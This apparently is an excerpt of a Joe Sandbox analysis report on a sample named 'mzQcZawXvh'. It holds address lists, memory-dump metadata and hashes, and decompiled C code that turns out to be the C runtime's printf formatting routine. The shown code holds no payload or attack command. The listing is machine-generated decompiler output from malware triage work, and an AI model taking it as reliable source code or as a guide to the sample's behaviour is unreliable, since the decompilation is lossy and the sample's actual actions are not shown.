                            0x00423277
                            0x0042327b
                            0x0042327e
                            0x00000000
                            0x00423280
                            0x00423283
                            0x00423286
                            0x0042328c
                            0x00423291
                            0x00000000
                            0x00423291
                            0x00000000
                            0x0042331b
                            0x0042331b
                            0x0042331e
                            0x00423321
                            0x00000000
                            0x00000000
                            0x00423239
                            0x00423239
                            0x0042323c
                            0x0042323f
                            0x00423242
                            0x0042325b
                            0x0042325e
                            0x0042325e
                            0x00423261
                            0x00423244
                            0x00423244
                            0x00423247
                            0x0042324a
                            0x00423250
                            0x00423256
                            0x00423256
                            0x00000000
                            0x00000000
                            0x00423326
                            0x00423326
                            0x00423329
                            0x00423329
                            0x0042332f
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00423337
                            0x00423337
                            0x0042333e
                            0x00423344
                            0x0042334a
                            0x0042334d
                            0x00423353
                            0x0042335a
                            0x00423bb0
                            0x00423bb0
                            0x00423bb0
                            0x00423bb4
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00423bb4
                            0x00423bb0
                            0x00423360
                            0x00423366
                            0x00423366
                            0x0042336d
                            0x00000000
                            0x004236f1
                            0x004236f1
                            0x004236ff
                            0x004236ff
                            0x00423702
                            0x00000000
                            0x00000000
                            0x00423374
                            0x00423377
                            0x00423377
                            0x0042337d
                            0x0042337f
                            0x00423382
                            0x00423382
                            0x00423385
                            0x00423385
                            0x00000000
                            0x00000000
                            0x004234ba
                            0x004234bd
                            0x004234bd
                            0x004234c2
                            0x004234c4
                            0x004234c7
                            0x004234c7
                            0x004234ca
                            0x004234ca
                            0x00000000
                            0x00000000
                            0x004238bd
                            0x004238bd
                            0x00000000
                            0x00000000
                            0x00423424
                            0x00423424
                            0x00423430
                            0x00423436
                            0x0042343d
                            0x0042344b
                            0x0042344b
                            0x00423451
                            0x00423454
                            0x00423460
                            0x004234b5
                            0x00000000
                            0x004234b5
                            0x0042343f
                            0x0042343f
                            0x00423445
                            0x00423449
                            0x00423468
                            0x00423468
                            0x0042346e
                            0x00423496
                            0x0042349d
                            0x004234a3
                            0x004234a6
                            0x004234a9
                            0x004234af
                            0x004234b2
                            0x00423470
                            0x00423470
                            0x00423476
                            0x00423479
                            0x0042347c
                            0x00423482
                            0x00423485
                            0x00423488
                            0x0042348a
                            0x0042348d
                            0x0042348d
                            0x00000000
                            0x0042346e
                            0x00000000
                            0x00000000
                            0x00423709
                            0x0042370c
                            0x0042370f
                            0x00423712
                            0x00423718
                            0x0042371b
                            0x00423722
                            0x00423726
                            0x00423731
                            0x00423731
                            0x00423735
                            0x0042374c
                            0x0042374c
                            0x00423753
                            0x00423755
                            0x00423755
                            0x0042375c
                            0x0042375c
                            0x00423763
                            0x00423771
                            0x00423774
                            0x00423783
                            0x00423786
                            0x0042378a
                            0x0042379f
                            0x0042378c
                            0x0042378c
                            0x0042378f
                            0x00423795
                            0x0042379a
                            0x0042379a
                            0x0042378a
                            0x004237a9
                            0x004237ac
                            0x004237af
                            0x004237b2
                            0x004237b5
                            0x004237b8
                            0x004237be
                            0x004237c4
                            0x004237cc
                            0x004237cd
                            0x004237d0
                            0x004237d1
                            0x004237d4
                            0x004237d5
                            0x004237dc
                            0x004237dd
                            0x004237e0
                            0x004237e1
                            0x004237e4
                            0x004237e5
                            0x004237eb
                            0x004237ec
                            0x004237fb
                            0x004237fd
                            0x00423803
                            0x00423803
                            0x00423808
                            0x0042380a
                            0x0042380e
                            0x00423810
                            0x00423818
                            0x00423819
                            0x0042381c
                            0x0042381d
                            0x0042382c
                            0x0042382e
                            0x0042382e
                            0x0042380e
                            0x00423831
                            0x00423838
                            0x0042383b
                            0x00423840
                            0x00423840
                            0x00423846
                            0x00423848
                            0x00423850
                            0x00423851
                            0x00423854
                            0x00423855
                            0x00423863
                            0x00423865
                            0x00423865
                            0x00423846
                            0x00423868
                            0x0042386b
                            0x0042386e
                            0x00423871
                            0x00423876
                            0x0042387b
                            0x0042387e
                            0x00423881
                            0x00423881
                            0x00423884
                            0x00423884
                            0x00423887
                            0x00423893
                            0x00423bb0
                            0x00423bb0
                            0x00423bb0
                            0x00423bb4
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00423bb4
                            0x00000000
                            0x00423bb0
                            0x00423737
                            0x00423737
                            0x0042373e
                            0x00423741
                            0x00000000
                            0x00000000
                            0x00423743
                            0x00423743
                            0x00000000
                            0x00423743
                            0x00423728
                            0x00423728
                            0x00000000
                            0x00000000
                            0x00423388
                            0x00423388
                            0x00423393
                            0x0042339b
                            0x004233a2
                            0x004233a5
                            0x004233a5
                            0x004233a8
                            0x00423408
                            0x004233aa
                            0x004233b1
                            0x004233b7
                            0x004233bd
                            0x004233c4
                            0x004233c7
                            0x004233cd
                            0x004233d5
                            0x004233d7
                            0x004233de
                            0x004233e5
                            0x004233ec
                            0x004233f4
                            0x004233f6
                            0x004233f8
                            0x004233f8
                            0x004233ff
                            0x0042340f
                            0x00423415
                            0x00423418
                            0x00423bb0
                            0x00423bb0
                            0x00423bb0
                            0x00423bb4
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00423bb4
                            0x00000000
                            0x0042389b
                            0x0042389e
                            0x004238a1
                            0x004238a4
                            0x00423922
                            0x00423925
                            0x0042392a
                            0x0042394c
                            0x0042394c
                            0x00423952
                            0x00423974
                            0x00423977
                            0x004239be
                            0x004239be
                            0x004239c1
                            0x004239e2
                            0x004239e7
                            0x004239ea
                            0x004239ec
                            0x004239f2
                            0x004239c3
                            0x004239c7
                            0x004239cc
                            0x004239cf
                            0x004239d0
                            0x004239d6
                            0x004239d6
                            0x00423979
                            0x0042397c
                            0x0042397c
                            0x0042397f
                            0x004239a1
                            0x004239a6
                            0x004239ac
                            0x004239ad
                            0x004239b3
                            0x00423981
                            0x00423985
                            0x0042398a
                            0x0042398e
                            0x0042398f
                            0x00423995
                            0x00423995
                            0x004239b9
                            0x00423954
                            0x00423958
                            0x0042395d
                            0x00423960
                            0x00423966
                            0x00423966
                            0x0042392c
                            0x00423930
                            0x00423935
                            0x00423938
                            0x0042393e
                            0x0042393e
                            0x004239fb
                            0x004239fe
                            0x00000000
                            0x00000000
                            0x00000000
                            0x004235fa
                            0x004235fa
                            0x00423606
                            0x0042360c
                            0x00423611
                            0x00423613
                            0x004236bd
                            0x004236bd
                            0x004236c0
                            0x004236c0
                            0x004236c3
                            0x004236d7
                            0x004236dd
                            0x004236e3
                            0x004236c5
                            0x004236c5
                            0x004236cb
                            0x004236d2
                            0x004236d2
                            0x004236e5
                            0x00423bb0
                            0x00423bb0
                            0x00423bb0
                            0x00423bb4
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00423bb4
                            0x00423bb0
                            0x00423619
                            0x00423619
                            0x00423619
                            0x0042361b
                            0x00423629
                            0x0042361d
                            0x0042361d
                            0x0042361d
                            0x00423633
                            0x00423639
                            0x0042363f
                            0x00423646
                            0x00423648
                            0x0042364d
                            0x0042364f
                            0x00423654
                            0x00423659
                            0x0042365b
                            0x00423660
                            0x00423663
                            0x00423666
                            0x00423668
                            0x00423668
                            0x00423666
                            0x00423669
                            0x00423670
                            0x004236b8
                            0x00423bb0
                            0x00423bb0
                            0x00423bb0
                            0x00423bb4
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00423bb4
                            0x00423672
                            0x00423672
                            0x00423677
                            0x00423693
                            0x0042369b
                            0x004236a5
                            0x004236a8
                            0x004236ad
                            0x00000000
                            0x004236ad
                            0x00000000
                            0x00000000
                            0x00000000
                            0x004238b6
                            0x004238b6
                            0x00000000
                            0x00000000
                            0x004234cd
                            0x004234cd
                            0x004234d1
                            0x004234df
                            0x004234e2
                            0x004234d3
                            0x004234d3
                            0x004234d3
                            0x004234e8
                            0x004234ee
                            0x004234f4
                            0x00423500
                            0x00423506
                            0x00423506
                            0x00423509
                            0x00423591
                            0x00423591
                            0x00423595
                            0x00423597
                            0x0042359d
                            0x0042359d
                            0x004235a0
                            0x004235a7
                            0x004235aa
                            0x004235b0
                            0x004235b0
                            0x004235b0
                            0x004235b6
                            0x004235bc
                            0x004235bf
                            0x004235c5
                            0x004235c7
                            0x00000000
                            0x00000000
                            0x004235c9
                            0x004235c9
                            0x004235cf
                            0x004235d2
                            0x004235d4
                            0x00000000
                            0x00000000
                            0x004235d6
                            0x004235dc
                            0x004235df
                            0x004235df
                            0x004235e7
                            0x004235e7
                            0x004235ed
                            0x004235ed
                            0x004235f2
                            0x00000000
                            0x0042350f
                            0x0042350f
                            0x0042350f
                            0x00423513
                            0x00423515
                            0x0042351a
                            0x0042351a
                            0x0042351d
                            0x00423520
                            0x00423526
                            0x00423538
                            0x00423538
                            0x00423538
                            0x0042353b
                            0x00423541
                            0x00000000
                            0x00000000
                            0x00423543
                            0x00423543
                            0x00423549
                            0x0042354c
                            0x0042354e
                            0x00000000
                            0x00000000
                            0x00423550
                            0x00423550
                            0x00423559
                            0x0042355f
                            0x00423563
                            0x0042356b
                            0x0042356d
                            0x0042356f
                            0x00423575
                            0x00423575
                            0x00423578
                            0x00423578
                            0x00423584
                            0x00423587
                            0x0042352f
                            0x00423532
                            0x00423532
                            0x00423535
                            0x00423535
                            0x0042358f
                            0x004235f5
                            0x00423bb0
                            0x00423bb0
                            0x00423bb0
                            0x00423bb4
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00423bb4
                            0x00423bb0
                            0x00000000
                            0x004238ad
                            0x004238ad
                            0x00423922
                            0x00423922
                            0x00423925
                            0x0042392a
                            0x0042394c
                            0x0042394c
                            0x00423952
                            0x00423974
                            0x00423977
                            0x004239be
                            0x004239be
                            0x004239c1
                            0x004239e2
                            0x004239e7
                            0x004239ea
                            0x004239ec
                            0x004239f2
                            0x004239c3
                            0x004239c7
                            0x004239cc
                            0x004239cf
                            0x004239d0
                            0x004239d6
                            0x004239d6
                            0x00423979
                            0x0042397c
                            0x0042397c
                            0x0042397f
                            0x004239a1
                            0x004239a6
                            0x004239ac
                            0x004239ad
                            0x004239b3
                            0x00423981
                            0x00423985
                            0x0042398a
                            0x0042398e
                            0x0042398f
                            0x00423995
                            0x00423995
                            0x004239b9
                            0x00423954
                            0x00423958
                            0x0042395d
                            0x00423960
                            0x00423966
                            0x00423966
                            0x0042392c
                            0x00423930
                            0x00423935
                            0x00423938
                            0x0042393e
                            0x0042393e
                            0x004239fb
                            0x004239fe
                            0x00000000
                            0x00000000
                            0x00000000
                            0x004239fe
                            0x00000000
                            0x004238c9
                            0x004238c9
                            0x004238d3
                            0x004238d3
                            0x004238dd
                            0x004238dd
                            0x004238e3
                            0x004238e5
                            0x004238ea
                            0x004238f4
                            0x004238f4
                            0x004238f7
                            0x004238fb
                            0x004238fb
                            0x00423922
                            0x00423922
                            0x00423925
                            0x0042392a
                            0x0042394c
                            0x0042394c
                            0x00423952
                            0x00423974
                            0x00423977
                            0x004239be
                            0x004239be
                            0x004239c1
                            0x004239e2
                            0x004239e7
                            0x004239ea
                            0x004239ec
                            0x004239f2
                            0x004239c3
                            0x004239c7
                            0x004239cc
                            0x004239cf
                            0x004239d0
                            0x004239d6
                            0x004239d6
                            0x00423979
                            0x0042397c
                            0x0042397c
                            0x0042397f
                            0x004239a1
                            0x004239a6
                            0x004239ac
                            0x004239ad
                            0x004239b3
                            0x00423981
                            0x00423985
                            0x0042398a
                            0x0042398e
                            0x0042398f
                            0x00423995
                            0x00423995
                            0x004239b9
                            0x00423954
                            0x00423958
                            0x0042395d
                            0x00423960
                            0x00423966
                            0x00423966
                            0x0042392c
                            0x00423930
                            0x00423935
                            0x00423938
                            0x0042393e
                            0x0042393e
                            0x004239fb
                            0x004239fe
                            0x00000000
                            0x00000000
                            0x00000000
                            0x004239fe
                            0x00000000
                            0x00423bb0
                            0x00423bb0
                            0x00423bb0
                            0x00423bb4
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00423bb4
                            0x00000000
                            0x00000000
                            0x00423139
                            0x00423139
                            0x0042313c
                            0x0042313f
                            0x00000000
                            0x00000000
                            0x00423144
                            0x00423147
                            0x0042314d
                            0x00000000
                            0x00000000
                            0x0042312e
                            0x00423131
                            0x00423134
                            0x00000000
                            0x00000000
                            0x00423123
                            0x00423126
                            0x00423129
                            0x00000000
                            0x00000000
                            0x00423152
                            0x00423152
                            0x00423155
                            0x00423155
                            0x00423158
                            0x00000000
                            0x00000000
                            0x0042315b
                            0x00000000
                            0x00000000
                            0x00422fcb
                            0x00422fcb
                            0x00422fcd
                            0x00422fdb
                            0x00422fcf
                            0x00422fcf
                            0x00422fcf
                            0x00422feb
                            0x00422ff8
                            0x00422ffa
                            0x00422fff
                            0x00423001
                            0x00423006
                            0x0042300b
                            0x0042300d
                            0x00423012
                            0x00423018
                            0x0042301a
                            0x0042301a
                            0x00423018
                            0x0042301b
                            0x00423022
                            0x00000000
                            0x00423024
                            0x00423029
                            0x00423045
                            0x0042304d
                            0x0042305a
                            0x0042305f
                            0x00423e74
                            0x00423e81
                            0x00423e81
                            0x00423022
                            0x00422fc5
                            0x00423db0
                            0x00423db0
                            0x00423db7
                            0x00423dce
                            0x00423dce
                            0x00423dd8
                            0x00423dd8
                            0x00423dde
                            0x00423de4
                            0x00423deb
                            0x00423ded
                            0x00423df2
                            0x00423df4
                            0x00423df9
                            0x00423dfe
                            0x00423e00
                            0x00423e05
                            0x00423e08
                            0x00423e0b
                            0x00423e0d
                            0x00423e0d
                            0x00423e0b
                            0x00423e0e
                            0x00423e15
                            0x00423e60
                            0x00423e69
                            0x00423e6e
                            0x00423e17
                            0x00423e1c
                            0x00423e38
                            0x00423e40
                            0x00423e4d
                            0x00423e52
                            0x00423e52
                            0x00000000
                            0x00423e15
                            0x00423db9
                            0x00423db9
                            0x00423dc0
                            0x00000000
                            0x00000000
                            0x00423dc2
                            0x00423dc2
                            0x00000000
                            0x00423dc2
                            0x00423bb0
                            0x00423b87
                            0x00423b87
                            0x00423b8b
                            0x00423b98
                            0x00423b9e
                            0x00423ba4
                            0x00423baa
                            0x00423baa
                            0x00423bad
                            0x00000000
                            0x00423bad
                            0x00423b8d
                            0x00423b93
                            0x00423b96
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00423b96
                            0x00423aec
                            0x00423aef
                            0x00423af9
                            0x00423b08
                            0x00423b11
                            0x00423b27
                            0x00423b2d
                            0x00423b33
                            0x00423b3a
                            0x00423b42
                            0x00423b42
                            0x00423b48
                            0x00423b48
                            0x00423b57
                            0x00423b5f
                            0x00423ace
                            0x00423ad4
                            0x00423ad7
                            0x00423ada
                            0x00423adc
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00423adc
                            0x00423ace
                            0x00423a0b
                            0x00423a0b
                            0x00423a12
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00423a40
                            0x00423a46
                            0x00423a52
                            0x00000000
                            0x00423a52
                            0x00423922

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.254379313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.254298173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.254460883.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255654257.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255687103.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255765961.0000000000635000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_mzQcZawXvh.jbxd
                            Similarity
                            • API ID: __aulldiv__aullrem_get_int64_arg
                            • String ID: 9
                            • API String ID: 3120068967-2366072709
                            • Opcode ID: e99518db696697a165a807a643a20938dd486c330cc2b7c9e6b38dba2698fba6
                            • Instruction ID: c244d4ae382631c369100802b87defad44086c78db6ad9b6ff75e88f9e021b77
                            • Opcode Fuzzy Hash: e99518db696697a165a807a643a20938dd486c330cc2b7c9e6b38dba2698fba6
                            • Instruction Fuzzy Hash: 1E4126B1E001299FDB24CF48DC81BAEB7B5FF85315F4041AAE289A7241C7385E81CF59
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 64%
                            			E0042200B(intOrPtr __ebx, signed int __edx, intOrPtr __edi, intOrPtr __esi) {
                            				signed int _t496;
                            				signed int _t518;
                            				void* _t523;
                            				signed int _t525;
                            				void* _t545;
                            				signed int _t563;
                            				signed int _t580;
                            				signed short _t581;
                            				signed int _t584;
                            				signed int _t587;
                            				signed int _t588;
                            				intOrPtr _t589;
                            				signed int _t609;
                            				signed int _t645;
                            				signed int _t647;
                            				signed int _t649;
                            				signed int _t656;
                            				signed int _t696;
                            				intOrPtr _t697;
                            				intOrPtr _t698;
                            				signed int _t699;
                            				void* _t701;
                            				void* _t702;
                            				signed int _t710;
                            
                            				L0:
                            				while(1) {
                            					L0:
                            					_t698 = __esi;
                            					_t697 = __edi;
                            					_t645 = __edx;
                            					_t589 = __ebx;
                            					 *(_t699 - 8) = 0xa;
                            					L153:
                            					while(1) {
                            						L153:
                            						while(1) {
                            							L153:
                            							while(1) {
                            								L153:
                            								if(( *(_t699 - 0x10) & 0x00008000) == 0) {
                            									_t647 =  *(_t699 - 0x10) & 0x00001000;
                            									if(_t647 == 0) {
                            										if(( *(_t699 - 0x10) & 0x00000020) == 0) {
                            											_t649 =  *(_t699 - 0x10) & 0x00000040;
                            											if(_t649 == 0) {
                            												_t496 = E0041C290(_t699 + 0x14);
                            												_t702 = _t701 + 4;
                            												 *(_t699 - 0x2b8) = _t496;
                            												 *(_t699 - 0x2b4) = 0;
                            											} else {
                            												_t580 = E0041C290(_t699 + 0x14);
                            												_t702 = _t701 + 4;
                            												asm("cdq");
                            												 *(_t699 - 0x2b8) = _t580;
                            												 *(_t699 - 0x2b4) = _t649;
                            											}
                            										} else {
                            											_t696 =  *(_t699 - 0x10) & 0x00000040;
                            											if(_t696 == 0) {
                            												_t581 = E0041C290(_t699 + 0x14);
                            												_t702 = _t701 + 4;
                            												asm("cdq");
                            												 *(_t699 - 0x2b8) = _t581 & 0x0000ffff;
                            												 *(_t699 - 0x2b4) = _t696;
                            											} else {
                            												_t584 = E0041C290(_t699 + 0x14);
                            												_t702 = _t701 + 4;
                            												asm("cdq");
                            												 *(_t699 - 0x2b8) = _t584;
                            												 *(_t699 - 0x2b4) = _t696;
                            											}
                            										}
                            									} else {
                            										_t587 = E0041C2B0(_t699 + 0x14);
                            										_t702 = _t701 + 4;
                            										 *(_t699 - 0x2b8) = _t587;
                            										 *(_t699 - 0x2b4) = _t647;
                            									}
                            								} else {
                            									_t588 = E0041C2B0(_t699 + 0x14);
                            									_t702 = _t701 + 4;
                            									 *(_t699 - 0x2b8) = _t588;
                            									 *(_t699 - 0x2b4) = _t645;
                            								}
                            								if(( *(_t699 - 0x10) & 0x00000040) == 0) {
                            									L170:
                            									 *(_t699 - 0x2c0) =  *(_t699 - 0x2b8);
                            									 *(_t699 - 0x2bc) =  *(_t699 - 0x2b4);
                            									goto L171;
                            								} else {
                            									L166:
                            									_t710 =  *(_t699 - 0x2b4);
                            									if(_t710 > 0 || _t710 >= 0 &&  *(_t699 - 0x2b8) >= 0) {
                            										goto L170;
                            									} else {
                            										L169:
                            										asm("adc edx, 0x0");
                            										 *(_t699 - 0x2c0) =  ~( *(_t699 - 0x2b8));
                            										 *(_t699 - 0x2bc) =  ~( *(_t699 - 0x2b4));
                            										 *(_t699 - 0x10) =  *(_t699 - 0x10) | 0x00000100;
                            										L171:
                            										if(( *(_t699 - 0x10) & 0x00008000) == 0 && ( *(_t699 - 0x10) & 0x00001000) == 0) {
                            											 *(_t699 - 0x2bc) =  *(_t699 - 0x2bc) & 0x00000000;
                            										}
                            										if( *(_t699 - 0x30) >= 0) {
                            											 *(_t699 - 0x10) =  *(_t699 - 0x10) & 0xfffffff7;
                            											if( *(_t699 - 0x30) > 0x200) {
                            												 *(_t699 - 0x30) = 0x200;
                            											}
                            										} else {
                            											 *(_t699 - 0x30) = 1;
                            										}
                            										if(( *(_t699 - 0x2c0) |  *(_t699 - 0x2bc)) == 0) {
                            											 *(_t699 - 0x1c) = 0;
                            										}
                            										 *((intOrPtr*)(_t699 - 4)) = _t699 - 0x49;
                            										while(1) {
                            											L181:
                            											_t655 =  *(_t699 - 0x30) - 1;
                            											 *(_t699 - 0x30) =  *(_t699 - 0x30) - 1;
                            											if( *(_t699 - 0x30) <= 0 && ( *(_t699 - 0x2c0) |  *(_t699 - 0x2bc)) == 0) {
                            												break;
                            											}
                            											L183:
                            											asm("cdq");
                            											_t656 =  *(_t699 - 0x2c0);
                            											 *((intOrPtr*)(_t699 - 0x2ac)) = E0041CE40(_t656,  *(_t699 - 0x2bc),  *(_t699 - 8), _t655) + 0x30;
                            											asm("cdq");
                            											 *(_t699 - 0x2c0) = E0041CDD0( *(_t699 - 0x2c0),  *(_t699 - 0x2bc),  *(_t699 - 8), _t656);
                            											 *(_t699 - 0x2bc) = _t656;
                            											if( *((intOrPtr*)(_t699 - 0x2ac)) > 0x39) {
                            												 *((intOrPtr*)(_t699 - 0x2ac)) =  *((intOrPtr*)(_t699 - 0x2ac)) +  *((intOrPtr*)(_t699 - 0x260));
                            											}
                            											 *((char*)( *((intOrPtr*)(_t699 - 4)))) =  *((intOrPtr*)(_t699 - 0x2ac));
                            											 *((intOrPtr*)(_t699 - 4)) =  *((intOrPtr*)(_t699 - 4)) - 1;
                            										}
                            										L186:
                            										 *((intOrPtr*)(_t699 - 0x24)) = _t699 - 0x49 -  *((intOrPtr*)(_t699 - 4));
                            										 *((intOrPtr*)(_t699 - 4)) =  *((intOrPtr*)(_t699 - 4)) + 1;
                            										if(( *(_t699 - 0x10) & 0x00000200) != 0 && ( *((intOrPtr*)(_t699 - 0x24)) == 0 ||  *((char*)( *((intOrPtr*)(_t699 - 4)))) != 0x30)) {
                            											 *((intOrPtr*)(_t699 - 4)) =  *((intOrPtr*)(_t699 - 4)) - 1;
                            											 *((char*)( *((intOrPtr*)(_t699 - 4)))) = 0x30;
                            											 *((intOrPtr*)(_t699 - 0x24)) =  *((intOrPtr*)(_t699 - 0x24)) + 1;
                            										}
                            										L190:
                            										while(1) {
                            											L190:
                            											while(1) {
                            												L190:
                            												while(1) {
                            													L190:
                            													while(1) {
                            														L190:
                            														while(1) {
                            															L190:
                            															while(1) {
                            																L190:
                            																while(1) {
                            																	do {
                            																		L190:
                            																		if( *((intOrPtr*)(_t699 - 0x28)) != 0) {
                            																			L216:
                            																			if( *(_t699 - 0x20) != 0) {
                            																				L0040C240( *(_t699 - 0x20), 2);
                            																				_t702 = _t702 + 8;
                            																				 *(_t699 - 0x20) = 0;
                            																			}
                            																			while(1) {
                            																				L218:
                            																				 *(_t699 - 0x251) =  *( *(_t699 + 0xc));
                            																				_t663 =  *(_t699 - 0x251);
                            																				 *(_t699 + 0xc) =  *(_t699 + 0xc) + 1;
                            																				if( *(_t699 - 0x251) == 0 ||  *(_t699 - 0x24c) < 0) {
                            																					break;
                            																				} else {
                            																					if( *(_t699 - 0x251) < 0x20 ||  *(_t699 - 0x251) > 0x78) {
                            																						 *(_t699 - 0x310) = 0;
                            																					} else {
                            																						 *(_t699 - 0x310) =  *( *(_t699 - 0x251) + L"pecifier\", 0)") & 0xf;
                            																					}
                            																				}
                            																				L7:
                            																				 *(_t699 - 0x250) =  *(_t699 - 0x310);
                            																				_t525 =  *(_t699 - 0x250) * 9;
                            																				_t609 =  *(_t699 - 0x25c);
                            																				_t663 = ( *(_t525 + _t609 + 0x4083d0) & 0x000000ff) >> 4;
                            																				 *(_t699 - 0x25c) = ( *(_t525 + _t609 + 0x4083d0) & 0x000000ff) >> 4;
                            																				if( *(_t699 - 0x25c) != 8) {
                            																					L16:
                            																					 *(_t699 - 0x318) =  *(_t699 - 0x25c);
                            																					if( *(_t699 - 0x318) > 7) {
                            																						continue;
                            																					}
                            																					L17:
                            																					switch( *((intOrPtr*)( *(_t699 - 0x318) * 4 +  &M004225E0))) {
                            																						case 0:
                            																							L18:
                            																							 *(_t699 - 0xc) = 0;
                            																							_t528 = E00419390( *(_t699 - 0x251) & 0x000000ff, E0040D3B0(_t699 - 0x40));
                            																							_t705 = _t702 + 8;
                            																							if(_t528 == 0) {
                            																								L24:
                            																								E004226F0( *(_t699 - 0x251) & 0x000000ff,  *(_t699 - 0x251) & 0x000000ff,  *((intOrPtr*)(_t699 + 8)), _t699 - 0x24c);
                            																								_t702 = _t705 + 0xc;
                            																								goto L218;
                            																							} else {
                            																								E004226F0( *((intOrPtr*)(_t699 + 8)),  *(_t699 - 0x251) & 0x000000ff,  *((intOrPtr*)(_t699 + 8)), _t699 - 0x24c);
                            																								_t705 = _t705 + 0xc;
                            																								_t614 =  *( *(_t699 + 0xc));
                            																								 *(_t699 - 0x251) =  *( *(_t699 + 0xc));
                            																								_t663 =  *(_t699 + 0xc) + 1;
                            																								 *(_t699 + 0xc) = _t663;
                            																								asm("sbb eax, eax");
                            																								 *(_t699 - 0x27c) =  ~( ~( *(_t699 - 0x251)));
                            																								if(_t663 == 0) {
                            																									_push(L"(ch != _T(\'\\0\'))");
                            																									_push(0);
                            																									_push(0x486);
                            																									_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
                            																									_push(2);
                            																									_t540 = L0040E1A0();
                            																									_t705 = _t705 + 0x14;
                            																									if(_t540 == 1) {
                            																										asm("int3");
                            																									}
                            																								}
                            																								L22:
                            																								if( *(_t699 - 0x27c) != 0) {
                            																									goto L24;
                            																								} else {
                            																									 *((intOrPtr*)(L0040EC70(_t614))) = 0x16;
                            																									E00411A50(_t589, _t614, _t697, _t698, L"(ch != _T(\'\\0\'))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x486, 0);
                            																									 *(_t699 - 0x2f4) = 0xffffffff;
                            																									E0040D380(_t699 - 0x40);
                            																									_t518 =  *(_t699 - 0x2f4);
                            																									goto L229;
                            																								}
                            																							}
                            																						case 1:
                            																							L25:
                            																							 *(__ebp - 0x2c) = 0;
                            																							__edx =  *(__ebp - 0x2c);
                            																							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                            																							__eax =  *(__ebp - 0x28);
                            																							 *(__ebp - 0x18) =  *(__ebp - 0x28);
                            																							__ecx =  *(__ebp - 0x18);
                            																							 *(__ebp - 0x1c) = __ecx;
                            																							 *(__ebp - 0x10) = 0;
                            																							 *(__ebp - 0x30) = 0xffffffff;
                            																							 *(__ebp - 0xc) = 0;
                            																							goto L218;
                            																						case 2:
                            																							L26:
                            																							__edx =  *((char*)(__ebp - 0x251));
                            																							 *(__ebp - 0x31c) =  *((char*)(__ebp - 0x251));
                            																							 *(__ebp - 0x31c) =  *(__ebp - 0x31c) - 0x20;
                            																							 *(__ebp - 0x31c) =  *(__ebp - 0x31c) - 0x20;
                            																							if( *(__ebp - 0x31c) > 0x10) {
                            																								goto L33;
                            																							}
                            																							L27:
                            																							__ecx =  *(__ebp - 0x31c);
                            																							_t72 = __ecx + 0x422618; // 0x498d04
                            																							__edx =  *_t72 & 0x000000ff;
                            																							switch( *((intOrPtr*)(( *_t72 & 0x000000ff) * 4 +  &M00422600))) {
                            																								case 0:
                            																									goto L30;
                            																								case 1:
                            																									goto L31;
                            																								case 2:
                            																									goto L29;
                            																								case 3:
                            																									goto L28;
                            																								case 4:
                            																									goto L32;
                            																								case 5:
                            																									goto L33;
                            																							}
                            																						case 3:
                            																							L34:
                            																							__edx =  *((char*)(__ebp - 0x251));
                            																							if( *((char*)(__ebp - 0x251)) != 0x2a) {
                            																								__eax =  *(__ebp - 0x18);
                            																								__eax =  *(__ebp - 0x18) * 0xa;
                            																								__ecx =  *((char*)(__ebp - 0x251));
                            																								_t96 = __ecx - 0x30; // -48
                            																								__edx = __eax + _t96;
                            																								 *(__ebp - 0x18) = __eax + _t96;
                            																							} else {
                            																								__eax = __ebp + 0x14;
                            																								 *(__ebp - 0x18) = E0041C290(__ebp + 0x14);
                            																								if( *(__ebp - 0x18) < 0) {
                            																									__ecx =  *(__ebp - 0x10);
                            																									__ecx =  *(__ebp - 0x10) | 0x00000004;
                            																									 *(__ebp - 0x10) = __ecx;
                            																									 *(__ebp - 0x18) =  ~( *(__ebp - 0x18));
                            																									 *(__ebp - 0x18) =  ~( *(__ebp - 0x18));
                            																								}
                            																							}
                            																							goto L218;
                            																						case 4:
                            																							L40:
                            																							 *(__ebp - 0x30) = 0;
                            																							goto L218;
                            																						case 5:
                            																							L41:
                            																							__eax =  *((char*)(__ebp - 0x251));
                            																							if( *((char*)(__ebp - 0x251)) != 0x2a) {
                            																								 *(__ebp - 0x30) =  *(__ebp - 0x30) * 0xa;
                            																								_t107 =  *((char*)(__ebp - 0x251)) - 0x30; // -48
                            																								__ecx =  *(__ebp - 0x30) * 0xa + _t107;
                            																								 *(__ebp - 0x30) = __ecx;
                            																							} else {
                            																								__ecx = __ebp + 0x14;
                            																								 *(__ebp - 0x30) = E0041C290(__ebp + 0x14);
                            																								if( *(__ebp - 0x30) < 0) {
                            																									 *(__ebp - 0x30) = 0xffffffff;
                            																								}
                            																							}
                            																							goto L218;
                            																						case 6:
                            																							L47:
                            																							__edx =  *((char*)(__ebp - 0x251));
                            																							 *(__ebp - 0x320) =  *((char*)(__ebp - 0x251));
                            																							 *(__ebp - 0x320) =  *(__ebp - 0x320) - 0x49;
                            																							 *(__ebp - 0x320) =  *(__ebp - 0x320) - 0x49;
                            																							if( *(__ebp - 0x320) > 0x2e) {
                            																								L70:
                            																								goto L218;
                            																							}
                            																							L48:
                            																							__ecx =  *(__ebp - 0x320);
